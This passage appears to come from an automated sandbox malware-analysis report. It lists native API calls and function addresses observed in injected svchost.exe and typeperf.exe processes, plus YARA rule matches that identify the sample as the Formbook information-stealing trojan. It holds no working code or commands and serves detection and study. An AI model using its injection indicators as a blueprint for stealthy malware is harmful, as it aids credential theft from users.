            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72D00 NtSetInformationFile,9_2_03C72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72D10 NtMapViewOfSection,9_2_03C72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C73D10 NtOpenProcessToken,9_2_03C73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72D30 NtUnmapViewOfSection,9_2_03C72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72CC0 NtQueryVirtualMemory,9_2_03C72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72CF0 NtOpenProcess,9_2_03C72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72CA0 NtQueryInformationToken,9_2_03C72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72C60 NtCreateKey,9_2_03C72C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72C70 NtFreeVirtualMemory,9_2_03C72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C72C00 NtQueryInformationProcess,9_2_03C72C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03174340 NtSetContextThread,LdrInitializeThunk,12_2_03174340
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03174650 NtSuspendThread,LdrInitializeThunk,12_2_03174650
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031735C0 NtCreateMutant,LdrInitializeThunk,12_2_031735C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172B60 NtClose,LdrInitializeThunk,12_2_03172B60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_03172BA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_03172BF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172BE0 NtQueryValueKey,LdrInitializeThunk,12_2_03172BE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172AD0 NtReadFile,LdrInitializeThunk,12_2_03172AD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172AF0 NtWriteFile,LdrInitializeThunk,12_2_03172AF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031739B0 NtGetContextThread,LdrInitializeThunk,12_2_031739B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172F30 NtCreateSection,LdrInitializeThunk,12_2_03172F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172FB0 NtResumeThread,LdrInitializeThunk,12_2_03172FB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172FE0 NtCreateFile,LdrInitializeThunk,12_2_03172FE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_03172E80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172EE0 NtQueueApcThread,LdrInitializeThunk,12_2_03172EE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172D10 NtMapViewOfSection,LdrInitializeThunk,12_2_03172D10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_03172D30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172DD0 NtDelayExecution,LdrInitializeThunk,12_2_03172DD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_03172DF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_03172C70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172C60 NtCreateKey,LdrInitializeThunk,12_2_03172C60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_03172CA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03173010 NtOpenDirectoryObject,12_2_03173010
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03173090 NtSetValueKey,12_2_03173090
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172B80 NtQueryInformationFile,12_2_03172B80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172AB0 NtWaitForSingleObject,12_2_03172AB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172F60 NtCreateProcessEx,12_2_03172F60
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172F90 NtProtectVirtualMemory,12_2_03172F90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172FA0 NtQuerySection,12_2_03172FA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172E30 NtWriteVirtualMemory,12_2_03172E30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172EA0 NtAdjustPrivilegesToken,12_2_03172EA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03173D10 NtOpenProcessToken,12_2_03173D10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172D00 NtSetInformationFile,12_2_03172D00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03173D70 NtOpenThread,12_2_03173D70
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172DB0 NtEnumerateKey,12_2_03172DB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172C00 NtQueryInformationProcess,12_2_03172C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172CC0 NtQueryVirtualMemory,12_2_03172CC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03172CF0 NtOpenProcess,12_2_03172CF0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D90C0 NtReadFile,12_2_005D90C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D91B0 NtDeleteFile,12_2_005D91B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D9250 NtClose,12_2_005D9250
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D93B0 NtAllocateVirtualMemory,12_2_005D93B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005D8F50 NtCreateFile,12_2_005D8F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004015409_2_00401540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004187739_2_00418773
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004100039_2_00410003
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004169539_2_00416953
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004011309_2_00401130
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004032509_2_00403250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004102239_2_00410223
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004012C09_2_004012C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040E2A39_2_0040E2A3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0042ED539_2_0042ED53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00402DC09_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_00402DB99_2_00402DB9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_0040262D9_2_0040262D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_004026309_2_00402630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4E3F09_2_03C4E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D003E69_2_03D003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C8739A9_2_03C8739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2D34C9_2_03C2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFA3529_2_03CFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF132D9_2_03CF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B2C09_2_03C5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE12ED9_2_03CE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C452A09_2_03C452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE02749_2_03CE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF81CC9_2_03CF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4B1B09_2_03C4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D001AA9_2_03D001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C7516C9_2_03C7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C2F1729_2_03C2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0B16B9_2_03D0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C301009_2_03C30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDA1189_2_03CDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEF0CC9_2_03CEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C470C09_2_03C470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF70E99_2_03CF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFF0E09_2_03CFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3C7C09_2_03C3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFF7B09_2_03CFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C647509_2_03C64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C407709_2_03C40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF16CC9_2_03CF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5C6E09_2_03C5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D005919_2_03D00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDD5B09_2_03CDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF75719_2_03CF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C405359_2_03C40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEE4F69_2_03CEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF24469_2_03CF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C314609_2_03C31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFF43F9_2_03CFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF6BD79_2_03CF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C7DBF99_2_03C7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5FB809_2_03C5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFAB409_2_03CFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFFB769_2_03CFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CEDAC69_2_03CEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3EA809_2_03C3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CDDAAC9_2_03CDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C85AA09_2_03C85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFFA499_2_03CFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF7A469_2_03CF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB3A6C9_2_03CB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C429A09_2_03C429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03D0A9A69_2_03D0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C499509_2_03C49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5B9509_2_03C5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C569629_2_03C56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C438E09_2_03C438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C6E8F09_2_03C6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C268B89_2_03C268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C428409_2_03C42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4A8409_2_03C4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C32FC89_2_03C32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4CFE09_2_03C4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C41F929_2_03C41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFFFB19_2_03CFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB4F409_2_03CB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFFF099_2_03CFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C82F289_2_03C82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C60F309_2_03C60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFEEDB9_2_03CFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C52E909_2_03C52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFCE939_2_03CFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C49EB09_2_03C49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40E599_2_03C40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFEE269_2_03CFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C5FDC09_2_03C5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C3ADE09_2_03C3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C58DBF9_2_03C58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C43D409_2_03C43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF1D5A9_2_03CF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CF7D739_2_03CF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C4AD009_2_03C4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C30CF29_2_03C30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CFFCF29_2_03CFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CE0CB59_2_03CE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03C40C009_2_03C40C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 9_2_03CB9C329_2_03CB9C32
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F132D12_2_031F132D
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FA35212_2_031FA352
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0312D34C12_2_0312D34C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0318739A12_2_0318739A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_032003E612_2_032003E6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314E3F012_2_0314E3F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031E027412_2_031E0274
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031452A012_2_031452A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315B2C012_2_0315B2C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031E12ED12_2_031E12ED
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031DA11812_2_031DA118
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313010012_2_03130100
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0320B16B12_2_0320B16B
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0312F17212_2_0312F172
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0317516C12_2_0317516C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_032001AA12_2_032001AA
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314B1B012_2_0314B1B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F81CC12_2_031F81CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031EF0CC12_2_031EF0CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031470C012_2_031470C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F70E912_2_031F70E9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FF0E012_2_031FF0E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0316475012_2_03164750
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314077012_2_03140770
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FF7B012_2_031FF7B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313C7C012_2_0313C7C0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F16CC12_2_031F16CC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315C6E012_2_0315C6E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314053512_2_03140535
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F757112_2_031F7571
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031DD5B012_2_031DD5B0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0320059112_2_03200591
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FF43F12_2_031FF43F
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F244612_2_031F2446
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313146012_2_03131460
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031EE4F612_2_031EE4F6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FAB4012_2_031FAB40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFB7612_2_031FFB76
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315FB8012_2_0315FB80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F6BD712_2_031F6BD7
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0317DBF912_2_0317DBF9
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFA4912_2_031FFA49
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F7A4612_2_031F7A46
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031B3A6C12_2_031B3A6C
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313EA8012_2_0313EA80
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031DDAAC12_2_031DDAAC
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03185AA012_2_03185AA0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031EDAC612_2_031EDAC6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314995012_2_03149950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315B95012_2_0315B950
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315696212_2_03156962
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0320A9A612_2_0320A9A6
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031429A012_2_031429A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314284012_2_03142840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314A84012_2_0314A840
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031268B812_2_031268B8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0316E8F012_2_0316E8F0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031438E012_2_031438E0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFF0912_2_031FFF09
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03160F3012_2_03160F30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03182F2812_2_03182F28
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031B4F4012_2_031B4F40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03141F9212_2_03141F92
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFFB112_2_031FFFB1
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03132FC812_2_03132FC8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314CFE012_2_0314CFE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FEE2612_2_031FEE26
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03140E5912_2_03140E59
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03152E9012_2_03152E90
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FCE9312_2_031FCE93
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03149EB012_2_03149EB0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FEEDB12_2_031FEEDB
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0314AD0012_2_0314AD00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F1D5A12_2_031F1D5A
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03143D4012_2_03143D40
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031F7D7312_2_031F7D73
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03158DBF12_2_03158DBF
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0315FDC012_2_0315FDC0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_0313ADE012_2_0313ADE0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03140C0012_2_03140C00
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031B9C3212_2_031B9C32
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031E0CB512_2_031E0CB5
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_03130CF212_2_03130CF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_031FFCF212_2_031FFCF2
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C1C1012_2_005C1C10
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C52A012_2_005C52A0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005C348012_2_005C3480
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005DB88012_2_005DB880
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005BCB3012_2_005BCB30
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005BCD5012_2_005BCD50
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_005BADD012_2_005BADD0
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E28412_2_02E5E284
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E3A312_2_02E5E3A3
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5D7A812_2_02E5D7A8
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E74412_2_02E5E744
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: 12_2_02E5E50B12_2_02E5E50B
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DF6D2514_2_04DF6D25
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD061B14_2_04DD061B
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD7FD514_2_04DD7FD5
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DE074514_2_04DE0745
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DDD0B514_2_04DDD0B5
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD81F514_2_04DD81F5
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DDE92514_2_04DDE925
            Source: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exeCode function: 14_2_04DD627514_2_04DD6275
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 0312B970 appears 263 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 03175130 appears 36 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 031BF290 appears 105 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 03187E54 appears 88 times
            Source: C:\Windows\SysWOW64\typeperf.exeCode function: String function: 031AEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C2B970 appears 263 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03C87E54 appears 88 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CAEA12 appears 84 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03CBF290 appears 105 times
            Source: sa7Bw41TUq.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
